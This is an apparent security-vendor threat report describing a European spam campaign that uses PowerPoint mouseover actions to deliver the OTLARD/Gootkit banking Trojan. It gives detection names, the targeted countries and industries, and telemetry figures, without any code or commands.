Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan
While many of today’s malware sport relatively new capabilities, most of their authors or operators still use old techniques to deliver them. Malicious macros and shortcut (LNK) files are still used in ransomware, banking Trojans, and targeted attacks, for instance. These methods may be tried-and-tested, but we’re also seeing distinctive or otherwise overlooked techniques—such as the abuse of legitimate tools like PowerShell, or using malformed subtitle files to remotely take over a device.
Recently, we found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse’s pointer over a hyperlinked picture or text in a PowerPoint slideshow. This technique is employed by a Trojan downloader (detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A), which we’ve uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden. Affected industries include manufacturing, device fabrication, education, logistics, and pyrotechnics.
Malicious Mouseover Delivers OTLARD/Gootkit
The Trojan downloader we monitored and analyzed had a variant of OTLARD banking Trojan as payload (TROJ_ OTLARD.TY). OTLARD, also known as Gootkit, emerged as early as 2012 and soon evolved into an information-stealing Trojan with persistence, remote access, network traffic monitoring, and browser manipulation capabilities. In fact, OTLARD/Gootkit was used in a spam campaign in France last 2015, whose spammed messages masqueraded as a letter from the French Ministry of Justice.
OTLARD/Gootkit is known for stealing credentials and bank account information in Europe. Its operators, who use macro malware-laced documents to deliver their payloads, appear to have shifted tactics.
The spam run reflected data from our telemetry, which indicated a sudden spate of OTLARD-carrying spam emails on May 25 that peaked at 1,444 detections. It waned as fast as it rose, with only 782 detections by the 26th, before it died down on May 29. Spam email campaigns are known for short bursts of distribution to keep a low profile from security vendors and law enforcement.